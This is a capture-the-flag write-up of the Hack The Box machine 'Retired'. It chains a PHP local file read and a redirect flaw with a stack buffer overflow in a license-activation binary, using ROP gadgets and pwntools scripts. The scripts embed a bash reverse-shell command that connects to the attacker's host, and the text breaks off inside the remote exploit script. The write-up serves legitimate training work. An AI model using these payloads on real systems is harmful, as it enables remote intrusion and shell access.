# Retired - HTB

[[_TOC_]]

# Summary

<div align="center"><img width="560" height="424" src="images/0.png"></div>

Retired is an incredible medium-rated machine created by [uco2KFh](https://app.hackthebox.com/users/590762)

For foothold, we exploit a buffer overflow vulnerability in a binary but are not allowed to interact with it directly. Plus, it has some other "gotchas" to explore as well.  
For user, we have to find a cron job zipping a directory and coerce it into zipping the user's `id_rsa` by placing a symlink in that directory.  
The root involves leveraging `binfmt_misc`'s C (credentials) flag to escalate privilege through any SUID binary (possible because we can write to `/proc/sys/fs/binfmt_misc/register` through the `reg_helper` binary).

# Initial Recon

## nmap

```console
opcode@parrot$ nmap -p- --min-rate 5000 10.10.11.154
Nmap scan report for 10.10.11.154
Host is up (0.17s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
```

```console
opcode@parrot$ nmap -sC -sV -p 22,80 -oN retired.nmap 10.10.11.154
Nmap scan report for 10.10.11.154
Host is up (0.26s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 77:b2:16:57:c2:3c:10:bf:20:f1:62:76:ea:81:e4:69 (RSA)
|   256 cb:09:2a:1b:b9:b9:65:75:94:9d:dd:ba:11:28:5b:d2 (ECDSA)
|_  256 0d:40:f0:f5:a8:4b:63:29:ae:08:a1:66:c1:26:cd:6b (ED25519)
80/tcp open  http    nginx
| http-title: Agency - Start Bootstrap Theme
|_Requested resource was /index.php?page=default.html
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Only SSH and HTTP ports are open on this machine.

## Exploring the website:

Upon visiting http://10.10.11.154/ in the browser, we are greeted with the landing page:

![1](images/1.png)

There isn't much going on with the website.  
But notice that the URL changes to http://10.10.11.154/index.php?page=default.html  
It's always a good idea to check for LFI in such cases.  

## LFI and EAR

Attempting to access http://10.10.11.154/index.php?page=/etc/hosts redirects us back to the home page, but we can find the contents of `/etc/hosts` if we look at the requests in burp:
```
HTTP/1.1 302 Found
Server: nginx
Date: Wed, 10 Aug 2022 14:31:30 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: /index.php?page=default.html
Content-Length: 154

127.0.0.1	localhost
127.0.0.2	bullseye
::1		localhost ip6-localhost ip6-loopback
ff02::1		ip6-allnodes
ff02::2		ip6-allrouters

127.0.1.1 retired retired
```

It means that the website is vulnerable to EAR (Execution After Redirect) as well as the LFI.

## gobuster

Before we enumerate the LFI any further, we should use `gobuster` to find out more pages on the website:
```console
opcode@parrot$ gobuster dir -u http://10.10.11.154 -w cybersec/wordlists/raft-small-words.txt -x php,html
/js                   (Status: 301) [Size: 162] [--> http://10.10.11.154/js/]
/css                  (Status: 301) [Size: 162] [--> http://10.10.11.154/css/]
/index.php            (Status: 302) [Size: 0] [--> /index.php?page=default.html]
/assets               (Status: 301) [Size: 162] [--> http://10.10.11.154/assets/]
/default.html         (Status: 200) [Size: 11414]                                
/beta.html            (Status: 200) [Size: 4144]                                 
/.                    (Status: 302) [Size: 0] [--> /index.php?page=default.html] 
```

Besides the `default.html`, we also have the `beta.html` page.  
We can upload files on the page http://10.10.11.154/index.php?page=beta.html  
In its page source, we can also find:
```html
<form action="activate_license.php" method="post" enctype="multipart/form-data">
    <label for="formFile" class="form-label">Upload License Key File</label>
    <input class="form-control form-control-lg" id="formFile" type="file" name="licensefile"/>
    <button type="submit" class="btn btn-primary">Submit</button>
</form>
```

## Source code

The next step would be to look at the source code of the known pages.  
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=index.php'
```
We get:
```php
<?php
function sanitize_input($param) {
    $param1 = str_replace("../","",$param);
    $param2 = str_replace("./","",$param1);
    return $param2;
}

$page = $_GET['page'];
if (isset($page) && preg_match("/^[a-z]/", $page)) {
    $page = sanitize_input($page);
} else {
    header('Location: /index.php?page=default.html');
}

readfile($page);
?>
```

Firstly, the `readfile($page)` is responsible for disclosing the files to us. Hence, what we have here is a Local File Read (LFR) and not a Local File Inclusion (LFI).  
Notice that the code is trying to sanitize input to prevent LFR and path traversal, but it's all meaningless due to that Execute After Redirect (EAR) vulnerability.  
Usually you'd expect a `die()` or `exit()` after a `header('Location: /index.php?page=default.html')`

Let us check the contents of the other PHP file:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=activate_license.php'
```
We get:
```php
<?php
if(isset($_FILES['licensefile'])) {
    $license      = file_get_contents($_FILES['licensefile']['tmp_name']);
    $license_size = $_FILES['licensefile']['size'];

    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    if (!$socket) { echo "error socket_create()\n"; }

    if (!socket_connect($socket, '127.0.0.1', 1337)) {
        echo "error socket_connect()" . socket_strerror(socket_last_error()) . "\n";
    }

    socket_write($socket, pack("N", $license_size));
    socket_write($socket, $license);

    socket_shutdown($socket);
    socket_close($socket);
}
?>
```

Now, this is interesting. It allows us to upload a file, creates a socket to port 1337 on 127.0.0.1 and sends the uploaded file size, followed by its contents through that socket.

We need to figure out the service on port 1337.

## `proc` filesystem

Whenever we get an LFR, the `/proc` directory becomes a goldmine of information.  
Here is an excellent article to learn about all the info we can get there: https://www.kernel.org/doc/html/latest/filesystems/proc.html

The `/proc/net/tcp` can be used to get information about currently active TCP 
connections:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/proc/net/tcp'           
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode                                
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12503 1 00000000c8d3d60d 100 0 0 10 0
   1: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12534 1 000000006a9458c3 100 0 0 10 0
   2: 0100007F:0539 00000000:0000 0A 00000000:00000000 00:00000000 00000000    33        0 11710 1 00000000b4b1ab9a 100 0 0 10 0
```

The values in `local_address` are in hex. Ports 80, 22 and 1337 are in use.  
Since `0100007F` translates to `127.0.0.1`, port 1337 is only internally accessible.

The `/proc/PID/cmdline` can be used to see command line arguments for any process.  
But we do not know the PID of the process of interest (the one listening on port 1337).

We can use `/proc/sched_debug` to see all the running processes and their PIDs:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/proc/sched_debug'
runnable tasks:
 S            task   PID         tree-key  switches  prio     wait-time             sum-exec        sum-sleep
-------------------------------------------------------------------------------------------------------------
[--SNIP--]
 S activate_licens   423     28036.999584        14   120         0.000000         4.530134         0.000000 0 0 /
 S     in:imuxsock   431    136550.092174     11463   120         0.000000       393.835964         0.000000 0 0 /
 S   rs:main Q:Reg   433    136550.084478     11521   120         0.000000       363.592567         0.000000 0 0 /
 S           nginx   576      4668.995611         5   120         0.000000         0.466854         0.000000 0 0 /
[--SNIP--]
```

The process `activate_license` with PID 423 looks interesting:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/proc/423/cmdline' | cat -v
/usr/bin/activate_license^@1337^@
```

# Getting foothold with binary exploitation

## Binary Analysis

We can use the LFR to grab this binary:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/usr/bin/activate_license' --output activate_license
```

```console
opcode@parrot$ file activate_license 
activate_license: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=554631debe5b40be0f96cabea315eedd2439fb81, for GNU/Linux 3.2.0, with debug_info, not stripped
```
Looks like a standard 64-bit ELF binary. Thankfully it is not stripped.

We can chuck it at Ghidra and look at the pseudocode.  
This is the `main()` function:
```c
int main(int argc,char **argv)

{
  int port_scanf;
  __pid_t _Var1;
  int *piVar2;
  char *pcVar3;
  char clientaddr_s [16];
  sockaddr_in clientaddr;
  socklen_t clientaddrlen;
  sockaddr_in server;
  uint16_t port;
  int clientfd;
  int serverfd;
  
  if (argc != 2) {
    error("specify port to bind to");
  }
  port_scanf = __isoc99_sscanf(argv[1],0x102100,&port);
  if (port_scanf == -1) {
    piVar2 = __errno_location();
    pcVar3 = strerror(*piVar2);
    error(pcVar3);
  }
  printf("[+] starting server listening on port %d\n",(ulong)port);
  server.sin_family = 2;
  server.sin_addr = htonl(0x7f000001);
  server.sin_port = htons(port);
  serverfd = socket(2,1,6);
  if (serverfd == -1) {
    piVar2 = __errno_location();
    pcVar3 = strerror(*piVar2);
    error(pcVar3);
  }
  port_scanf = bind(serverfd,(sockaddr *)&server,0x10);
  if (port_scanf == -1) {
    piVar2 = __errno_location();
    pcVar3 = strerror(*piVar2);
    error(pcVar3);
  }
  port_scanf = listen(serverfd,100);
  if (port_scanf == -1) {
    piVar2 = __errno_location();
    pcVar3 = strerror(*piVar2);
    error(pcVar3);
  }
  puts("[+] listening ...");
  while( true ) {
    while( true ) {
      clientfd = accept(serverfd,(sockaddr *)&clientaddr,&clientaddrlen);
      if (clientfd != -1) break;
      fwrite("Error: accepting client\n",1,0x18,stderr);
    }
    inet_ntop(2,&clientaddr.sin_addr,clientaddr_s,0x10);
    printf("[+] accepted client connection from %s:%d\n",clientaddr_s,(ulong)clientaddr.sin_port) ;
    _Var1 = fork();
    if (_Var1 == 0) break;
    __sysv_signal(0x11,(__sighandler_t)0x1);
    close(clientfd);
  }
  close(serverfd);
  activate_license(clientfd);
}
```
It just asks for a port to bind to and starts a listener on that port on 127.0.0.1

We can look at that `activate_license` function:
```c
void activate_license(int sockfd)

{
  int iVar1;
  ssize_t sVar2;
  int *piVar3;
  char *pcVar4;
  sqlite3_stmt *stmt;
  sqlite3 *db;
  uint32_t msglen;
  char buffer [512];
  
  sVar2 = read(sockfd,&msglen,4);
  if (sVar2 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  msglen = ntohl(msglen);
  printf("[+] reading %d bytes\n",(ulong)msglen);
  sVar2 = read(sockfd,buffer,(ulong)msglen);
  if (sVar2 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  iVar1 = sqlite3_open(0x102028,&db);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  sqlite3_busy_timeout(db,2000);
  iVar1 = sqlite3_exec(db,0x102038,0,0,0);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_prepare_v2(db,0x1020a0,0xffffffff,&stmt,0);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_bind_text(stmt,1,buffer,0x200,0);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_step(stmt);
  if (iVar1 != 0x65) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_reset(stmt);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_finalize(stmt);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  iVar1 = sqlite3_close(db);
  if (iVar1 != 0) {
    pcVar4 = (char *)sqlite3_errmsg(db);
    error(pcVar4);
  }
  printf("[+] activated license: %s\n",buffer);
  return;
}
```

This seems to be vulnerable to buffer overflow. The interesting bit is here:
```c
  uint32_t msglen;
  char buffer [512];
  
  sVar2 = read(sockfd,&msglen,4);
  if (sVar2 == -1) {
    piVar3 = __errno_location();
    pcVar4 = strerror(*piVar3);
    error(pcVar4);
  }
  msglen = ntohl(msglen);
  printf("[+] reading %d bytes\n",(ulong)msglen);
  sVar2 = read(sockfd,buffer,(ulong)msglen);
```
The first 4 bytes read are being used to set `msglen`, and then `msglen` count of bytes are being read into `buffer`  
Since we can control `msglen`, we can write beyond the memory assigned to `buffer`

## Debugging with `gdb`

We can use `gdb` to verify our understanding of the vulnerability.

But first, we need to ensure that we are working with the same GLIBC as on remote.  
We can use the `proc` filesystem again to find out the libc being used:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/proc/423/maps'              
56533cfbf000-56533cfc0000 r--p 00000000 08:01 2408                       /usr/bin/activate_license
56533cfc0000-56533cfc1000 r-xp 00001000 08:01 2408                       /usr/bin/activate_license
56533cfc1000-56533cfc2000 r--p 00002000 08:01 2408                       /usr/bin/activate_license
56533cfc2000-56533cfc3000 r--p 00002000 08:01 2408                       /usr/bin/activate_license
56533cfc3000-56533cfc4000 rw-p 00003000 08:01 2408                       /usr/bin/activate_license
56533d509000-56533d52a000 rw-p 00000000 00:00 0                          [heap]
7ffacc087000-7ffacc089000 rw-p 00000000 00:00 0 
7ffacc089000-7ffacc08a000 r--p 00000000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7ffacc08a000-7ffacc08c000 r-xp 00001000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7ffacc08c000-7ffacc08d000 r--p 00003000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7ffacc08d000-7ffacc08e000 r--p 00003000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7ffacc08e000-7ffacc08f000 rw-p 00004000 08:01 3635                       /usr/lib/x86_64-linux-gnu/libdl-2.31.so
7ffacc08f000-7ffacc096000 r--p 00000000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7ffacc096000-7ffacc0a6000 r-xp 00007000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7ffacc0a6000-7ffacc0ab000 r--p 00017000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7ffacc0ab000-7ffacc0ac000 r--p 0001b000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7ffacc0ac000-7ffacc0ad000 rw-p 0001c000 08:01 3645                       /usr/lib/x86_64-linux-gnu/libpthread-2.31.so
7ffacc0ad000-7ffacc0b1000 rw-p 00000000 00:00 0 
7ffacc0b1000-7ffacc0c0000 r--p 00000000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7ffacc0c0000-7ffacc15a000 r-xp 0000f000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7ffacc15a000-7ffacc1f3000 r--p 000a9000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7ffacc1f3000-7ffacc1f4000 r--p 00141000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7ffacc1f4000-7ffacc1f5000 rw-p 00142000 08:01 3636                       /usr/lib/x86_64-linux-gnu/libm-2.31.so
7ffacc1f5000-7ffacc21a000 r--p 00000000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc21a000-7ffacc365000 r-xp 00025000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc365000-7ffacc3af000 r--p 00170000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc3af000-7ffacc3b0000 ---p 001ba000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc3b0000-7ffacc3b3000 r--p 001ba000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc3b3000-7ffacc3b6000 rw-p 001bd000 08:01 3634                       /usr/lib/x86_64-linux-gnu/libc-2.31.so
7ffacc3b6000-7ffacc3ba000 rw-p 00000000 00:00 0 
7ffacc3ba000-7ffacc3ca000 r--p 00000000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7ffacc3ca000-7ffacc4c2000 r-xp 00010000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7ffacc4c2000-7ffacc4f6000 r--p 00108000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7ffacc4f6000-7ffacc4fa000 r--p 0013b000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7ffacc4fa000-7ffacc4fd000 rw-p 0013f000 08:01 5321                       /usr/lib/x86_64-linux-gnu/libsqlite3.so.0.8.6
7ffacc4fd000-7ffacc4ff000 rw-p 00000000 00:00 0 
7ffacc504000-7ffacc505000 r--p 00000000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffacc505000-7ffacc525000 r-xp 00001000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffacc525000-7ffacc52d000 r--p 00021000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffacc52e000-7ffacc52f000 r--p 00029000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffacc52f000-7ffacc530000 rw-p 0002a000 08:01 3630                       /usr/lib/x86_64-linux-gnu/ld-2.31.so
7ffacc530000-7ffacc531000 rw-p 00000000 00:00 0 
7ffee0ad0000-7ffee0af1000 rw-p 00000000 00:00 0                          [stack]
7ffee0b41000-7ffee0b45000 r--p 00000000 00:00 0                          [vvar]
7ffee0b45000-7ffee0b47000 r-xp 00000000 00:00 0                          [vdso]
```

We can grab the libc with the LFR:
```console
opcode@parrot$ curl 'http://10.10.11.154/index.php?page=/usr/lib/x86_64-linux-gnu/libc-2.31.so' --output libc.so.6
```

Now, we can patch the `activate_license` binary to use this `libc`.  
We can use `pwninit` for that:
```console
opcode@parrot$ ./pwninit --bin activate_license --libc libc.so.6
```

Let's jump into gdb now:
```console
opcode@parrot$ gdb ./activate_license_patched
```

We can now run it with `r 1337`  
But if we connect to port 1337 with `nc`, we get an error even if we send some benign data:

![2](images/2.png)

To avoid these oddities, I prefer to attach to the process with gdb once it is up and running:
```console
opcode@parrot$ ./activate_license_patched 1337
[+] starting server listening on port 1337
[+] listening ...
```

We can find the PID with `ps`:
```console
opcode@parrot$ ps a | grep './activate'
   2231 pts/2    S+     0:00 ./activate_license_patched 1337
```

We can attach to that process now:
```console
opcode@parrot$ gdb -p 2231
```
It attaches just fine, but as soon we send any data to port 1337 to netcat, we get:
```
[Detaching after fork from child process 2474]
```
By default, `gdb` continues debugging the parent after a fork.  
To avoid it, we need to use `set follow-fork-mode child` in `gdb`:
```
gef➤  set follow-fork-mode child
gef➤  c
Continuing.
[Attaching after Thread 0x7f367b9260c0 (LWP 2680) fork to child process 3306]
[New inferior 2 (process 3306)]
[Detaching after fork from parent process 2680]
[Inferior 1 (process 2680) detached]
[Thread debugging using libthread_db enabled]
```

If we provide a small input, the child process exits normally, but if we provide a large input through `nc`, e.g.:
```console
opcode@parrot$ nc localhost 1337
9999AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
```
We get a segmentation fault:

![3](images/3.png)

Now, let's find out the number of bytes we need to overwrite the instruction pointer.  
With `disas activate_license` we get:

![4](images/4.png)

We need to set a breakpoint right after the second call to `read@plt`:
```
gef➤  b* activate_license+148
```
Next, I sent the input `0005AAAA` through `nc` and got a hit on the breakpoint.  
We can search for the input in memory and also inspect the frame.  

![5](images/5.png)

The difference 0x7ffd87ddd458-0x7ffd87ddd250 should give us the number of bytes needed to reach the instruction pointer.  
Hence, our offset is 520

## pwntools to automate mundane tasks

Since we can get a segmentation fault, we may also be able to manipulate control flow to gain arbitrary code execution.

Let's check the mitigations in place using `checksec`:
```console
opcode@parrot$ checksec activate_license_patched 
[*] '/home/opcode/retired/activate_license_patched'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
    RUNPATH:  b'.'
```
We do have NX, PIE, and full RELRO enabled... but we can get past NX and PIE thanks to the LFR.  
We also don't need to do a GOT overwrite for this exploit, so RELRO shouldn't bother us.

Now, this process of finding PID, attaching to it and running the gdb command to follow the child process is monotonous. We can automate all that in a `pwntools` script.

```py
from pwn import *

exe = context.binary = ELF('./activate_license_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']

offset = b'A'*520

p = process([exe.path, '1337'])
gdb.attach(p, gdbscript='''
set follow-fork-mode child
c
''')

input("Waiting...\n")

r = remote('127.0.0.1', 1337)
payload = p32(7331, endian='big')
payload += offset
r.sendline(payload)

p.interactive()
```
This should be good to get us started.

## Bypassing PIE and ASLR

We can bypass PIE and ASLR remotely with the help of LFR.  
We can read `/proc/423/maps` and use the values corresponding to `/usr/bin/activate_license` to predict PIE addresses.  
Similarly, values corresponding to `/usr/lib/x86_64-linux-gnu/libc-2.31.so` can be used to predict addresses of `libc` functions, essentially getting past the ASLR.

Locally, we can create helper functions to read /proc/pid/maps. For remote, we would have to make some helper functions that utilize the LFR to read it.

With all that out, let's think of ways to get a shell through binary exploitation.  
Several approaches are possible if we use ROP chains.

Usually, in binaries with buffer overflow, we can use ROP chains to call `system()` with `/bin/sh`  
But in this case, it would spawn a shell where the binary is running. Since we cannot directly interact with the `activate_license` binary, it is useless for us. Instead we want to call `system()` with something like `/bin/bash -c "bash -i >& /dev/tcp/10.10.14.62/9001 0>&1"`  
We could pull the string `/bin/sh` from the `libc`, but for the reverse shell string... it would not be present in libc.

## Write-What-Where gadgets

We now have to find a way to write arbitrary strings to memory. This is a textbook example of where `write-what-where` gadgets can be used.

The most commonly used `write-what-where` gadgets can be found with:
```console
opcode@parrot$ ROPgadget --binary libc.so.6 | grep -E ': mov qword ptr \[r[a-z]{2}\], r[a-z]{2} ; ret'
0x000000000008a0eb : mov qword ptr [rax], rdi ; ret
0x00000000000343c7 : mov qword ptr [rax], rdx ; ret
0x000000000014fcc0 : mov qword ptr [rcx], rdx ; ret
0x00000000000a2b26 : mov qword ptr [rdi], rcx ; ret
0x000000000003ace5 : mov qword ptr [rdi], rdx ; ret
0x00000000000603b2 : mov qword ptr [rdi], rsi ; ret
0x0000000000034b5c : mov qword ptr [rdx], rax ; ret
0x0000000000118b7d : mov qword ptr [rsi], rdi ; ret
```

For example, `mov qword ptr [rax], rdi ; ret` would take the contents in `rdi` register and place them at the memory location dereferenced by the `rax` register.  
When chained with gadgets that control `rdi` and `rax` registers, we can essentially write to any writable location in the memory.

Now comes the question of where to write. `readelf` can help us here:
```console
opcode@parrot$ readelf --sections --wide activate_license_patched
There are 34 section headers, starting at offset 0x4f88:

Section Headers:
  [Nr] Name              Type            Address          Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            0000000000000000 000000 000000 00      0   0  0
  [ 1] .gnu.version      VERSYM          000000000000088c 00088c 00004c 02   A 29   0  2
  [ 2] .gnu.version_r    VERNEED         00000000000008d8 0008d8 000030 00   A 28   1  8
  [ 3] .rela.dyn         RELA            0000000000000908 000908 0000d8 18   A 29   0  8
  [ 4] .rela.plt         RELA            00000000000009e0 0009e0 0002d0 18  AI 29  15  8
  [ 5] .init             PROGBITS        0000000000001000 001000 000017 00  AX  0   0  4
  [ 6] .plt              PROGBITS        0000000000001020 001020 0001f0 10  AX  0   0 16
  [ 7] .plt.got          PROGBITS        0000000000001210 001210 000008 08  AX  0   0  8
  [ 8] .text             PROGBITS        0000000000001220 001220 000601 00  AX  0   0 16
  [ 9] .fini             PROGBITS        0000000000001824 001824 000009 00  AX  0   0  4
  [10] .rodata           PROGBITS        0000000000002000 002000 00018b 00   A  0   0  8
  [11] .eh_frame_hdr     PROGBITS        000000000000218c 00218c 00004c 00   A  0   0  4
  [12] .eh_frame         PROGBITS        00000000000021d8 0021d8 000140 00   A  0   0  8
  [13] .init_array       INIT_ARRAY      0000000000003cb8 002cb8 000008 08  WA  0   0  8
  [14] .fini_array       FINI_ARRAY      0000000000003cc0 002cc0 000008 08  WA  0   0  8
  [15] .got              PROGBITS        0000000000003ec8 002ec8 000138 08  WA  0   0  8
  [16] .data             PROGBITS        0000000000004000 003000 000010 00  WA  0   0  8
  [17] .bss              NOBITS          0000000000004010 003010 000008 00  WA  0   0  1
  [18] .comment          PROGBITS        0000000000000000 003010 000027 01  MS  0   0  1
  [19] .debug_aranges    PROGBITS        0000000000000000 003037 000030 00      0   0  1
  [20] .debug_info       PROGBITS        0000000000000000 003067 000688 00      0   0  1
  [21] .debug_abbrev     PROGBITS        0000000000000000 0036ef 0001b9 00      0   0  1
  [22] .debug_line       PROGBITS        0000000000000000 0038a8 00028a 00      0   0  1
  [23] .debug_str        PROGBITS        0000000000000000 003b32 000577 01  MS  0   0  1
  [24] .symtab           SYMTAB          0000000000000000 0040b0 000960 18     25  49  8
  [25] .strtab           STRTAB          0000000000000000 004a10 000437 00      0   0  1
  [26] .shstrtab         STRTAB          0000000000000000 004e47 00013e 00      0   0  1
  [27] .dynamic          DYNAMIC         0000000000006000 006000 000210 10  WA 28   0  8
  [28] .dynstr           STRTAB          0000000000006210 006210 0001ce 00   A  0   0  8
  [29] .dynsym           DYNSYM          00000000000063e0 0063e0 000390 18   A 28   1  8
  [30] .gnu.hash         GNU_HASH        0000000000006770 006770 000028 00   A 29   0  8
  [31] .interp           PROGBITS        0000000000006798 006798 00001c 00   A  0   0  8
  [32] .note.ABI-tag     NOTE            00000000000067b8 0067b8 000020 00   A  0   0  4
  [33] .note.gnu.build-id NOTE            00000000000067d8 0067d8 000024 00   A  0   0  4
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  l (large), p (processor specific)
```

We should be able to use the bss section without any issues.  

## Local exploitation

This script works fine locally. (Note that it also starts the binary, attaches a debugger and finds the libc base on its own)
```py
from pwn import *

exe = context.binary = ELF('./activate_license_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']


def grab_vmmap(pid):
    with open(f'/proc/{pid}/maps') as f:
        vmmap = f.readlines()

    return vmmap


def grab_bases(vmmap):
    pie_base = vmmap[0].split('-')[0]
    libc_base = vmmap[24].split('-')[0]

    return int(pie_base, 16), int(libc_base, 16)


offset = b'A'*520

p = process([exe.path, '1337'])
gdb.attach(p, gdbscript='''
set follow-fork-mode child
c
''')

pid = pidof(p)[0]
# pid = pidof('activate_license_patched')[0]
vmmap = grab_vmmap(pid)
pie_base, libc_base = grab_bases(vmmap)

log.info(f'PIE base: {hex(pie_base)}')
log.info(f'libc base: {hex(libc_base)}')

libc.address = libc_base
rop_libc = ROP(libc)

pop_rdi = rop_libc.find_gadget(['pop rdi', 'ret'])[0]
pop_rax = rop_libc.find_gadget(['pop rax', 'ret'])[0]
pop_rdx = rop_libc.find_gadget(['pop rdx', 'ret'])[0]
www_gadget = next(libc.search(asm('mov qword ptr [rax], rdx; ret')))

system = libc.symbols['system']
revshell = b'/bin/bash -c "bash -i >& /dev/tcp/127.0.0.1/9001 0>&1"'

payload = p32(7331, endian='big')
payload += offset

for i in range(0, len(revshell), 8):
    payload += p64(pop_rdx)
    payload += revshell[i:i+8].ljust(8, b'\x00')
    payload += p64(pop_rax)
    payload += p64(pie_base + 0x4010 + i)
    payload += p64(www_gadget)

payload += p64(pop_rdi)
payload += p64(pie_base + 0x4010)
payload += p64(system)

r = remote('127.0.0.1', 1337)
r.sendline(payload)

p.interactive()
```

I used the write-what-where gadget and some other gadgets to write the shellcode to bss section, 8 bytes at a time.  
Everything else is just the usual `ret2libc`

## Remote exploitation

We need to modify things slightly as we cannot send data directly to port 1337. We can only upload a file on the beta.html page.  
I decided to have a similar local setup to debug things better.  
After moving the files I got with the LFI to `/var/www/html`, I started the webserver with:
```console
opcode@parrot$ sudo systemctl start apache2.service
```

We also need to start the binary with argument 1337.  
I tried to use `pkexec` to run it as `www-data` (otherwise, `www-data` would not be able to access `/proc/pid` for processes run by other users):
```console
opcode@parrot$ pkexec --user www-data /home/opcode/retired/activate_license_patched 1337
```
But it led to other issues: the `activate_license` binary could not create the `license.sqlite` file.  
In the end, I dropped all that and just updated a couple of lines in the `/etc/apache2/envvars`:
```
export APACHE_RUN_USER=opcode
export APACHE_RUN_GROUP=opcode
```
It results in the PHP server to running as the user `opcode` instead of `www-data`

Next, I updated the functions to grab libc and PIE bases through the LFR.  
And instead of sending the payload to a socket, we make a POST request to 
`/activate_license.php`  

This is the exploit for remote:
```py
import requests
from pwn import *

exe = context.binary = ELF('./activate_license_patched', checksec=False)
libc = ELF('./libc.so.6', checksec=False)
context.terminal = ['mate-terminal', '-e']

url = 'http://10.10.11.154'
pid = '423'

proxy = {}
# proxy['http'] = 'http://127.0.0.1:8080'


def grab_vmmap(url, pid):
